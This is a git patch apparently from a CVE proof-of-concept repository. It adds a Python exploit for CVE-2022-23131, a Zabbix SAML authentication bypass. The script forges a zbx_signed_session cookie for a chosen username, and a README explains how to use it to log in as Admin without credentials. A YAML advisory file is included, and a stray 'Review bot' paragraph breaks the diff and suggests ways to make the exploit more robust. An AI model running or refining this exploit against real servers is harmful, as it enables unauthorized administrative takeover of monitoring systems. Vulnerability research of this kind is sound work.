From a93ee26d6362b8908e59c0feee425428330258bc Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=A8=8A=E6=98=87=E8=BE=BE?= <7878151+fan_shengda@user.noreply.gitee.com>
Date: Tue, 4 Apr 2023 03:46:22 +0000
Subject: [PATCH] =?UTF-8?q?=E7=AC=AC=E5=9B=9B=E6=AC=A1=E6=8F=90=E4=BA=A4CV?=
 =?UTF-8?q?E-2022-23131,=E4=BF=AE=E6=94=B9=E4=BA=86yaml=E6=96=87=E4=BB=B6?=
 =?UTF-8?q?=E4=B8=AD=20=20scope-of-influence:=20=E7=9A=84=E7=BC=A9?=
 =?UTF-8?q?=E8=BF=9B=E9=94=99=E8=AF=AF=E3=80=82?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 樊昇达 <7878151+fan_shengda@user.noreply.gitee.com>
---
 .../2022/CVE-2022-23131/CVE-2022-23131.py | 37 +++++++++++++++++++
 cve/zabbix/2022/CVE-2022-23131/README.md | 4 ++
 cve/zabbix/2022/yaml/CVE-2022-23131.yaml | 20 ++++++++++
 other_list.yaml | 2 +
 4 files changed, 63 insertions(+)
 create mode 100644 cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py
 create mode 100644 cve/zabbix/2022/CVE-2022-23131/README.md
 create mode 100644 cve/zabbix/2022/yaml/CVE-2022-23131.yaml

diff --git a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py
new file mode 100644
index 00000000..881c7d68
--- /dev/null
+++ b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py
@@ -0,0 +1,37 @@
+import requests
+import re
+import urllib.parse
+import base64
+import json
+import sys
+
+def exp(target, username):
+    resp = requests.get(url=target, verify=False)
+    cookie = resp.headers.get("Set-Cookie")
+
+    zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)
+
+    url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')
+    base64_decode_data = base64.b64decode(url_decode_data)
+
+    decode_to_str = str(base64_decode_data, encoding='utf-8')
+
+    to_json = json.loads(decode_to_str)
+
+    tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])
+
+    payloadJson = json.dumps(tmp_ojb)
+    print("decode_payload:", payloadJson)
+
+    payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
+    print("zbx_signed_session:", payload)
+
+
+if __name__ == "__main__":
+    if len(sys.argv) != 3:
+        print("argv error")
+        exit(0)
+    target = sys.argv[1]
+    username = sys.argv[2]
+
+    exp(target, username)
\ No newline at end of file
diff --git a/cve/zabbix/2022/CVE-2022-23131/README.md b/cve/zabbix/2022/CVE-2022-23131/README.md
new file mode 100644
index 00000000..bd13b10a
--- /dev/null
+++ b/cve/zabbix/2022/CVE-2022-23131/README.md
@@ -0,0 +1,4 @@
+CVE-2022-23131
+使用方式:python3 CVE-2022-23131.py target Admin
+其中,target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面
+
diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
new file mode 100644
index 00000000..0eab256c
--- /dev/null
+++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
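Review bot: The cookie extraction in `exp` (`resp.headers.get("Set-Cookie")`, then `re.findall(r"zbx_session=(.*?); ", cookie)` and `zbx_session[0]`) raises a TypeError when the target sets no cookie at all and an IndexError when the `zbx_session` value is not followed by the literal `; ` the pattern demands, so a non-Zabbix host produces a traceback instead of a diagnosis. requests already parses the jar, so `zbx_session = resp.cookies.get("zbx_session")` followed by `if zbx_session is None:` / `sys.exit("no zbx_session cookie in response; target does not look like a Zabbix frontend")` is both more robust and clearer, with the later `zbx_session[0]` becoming plain `zbx_session`. The script also never checks that SAML authentication is enabled or that the frontend is in the 5.4.0–5.4.8 / 6.0.0alpha1 range the YAML in this same commit lists as affected, so the printed `zbx_signed_session` is only a candidate cookie and the README should say it is expected to be rejected on anything else. Separately, the argument-count guard should use `sys.exit(1)` rather than `exit(0)` so a wrapper can tell a usage error from success, and `verify=False` will emit an InsecureRequestWarning on every run unless `requests.packages.urllib3.disable_warnings()` is called first.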
@@ -0,0 +1,20 @@
+id: CVE-2022-23131
+source:
+  https://github.com/L0ading-x/cve-2022-23131
+info:
+  name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
+  severity: critical
+  description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
+  scope-of-influence:
+    Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
+    - https://www.secpulse.com/archives/179601.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-23131
+    cwe-id: CWE-290
+    cnvd-id: None
+    kve-id: None
+  tags: 前端认证绕过漏洞
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 8f7ee835..363ec2fb 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -41,4 +41,6 @@ cve:
     - CVE-2023-28432
   Node.js:
     - CVE-2021-21315
+  zabbix:
+    - CVE-2022-23131
 cnvd:
--
Gitee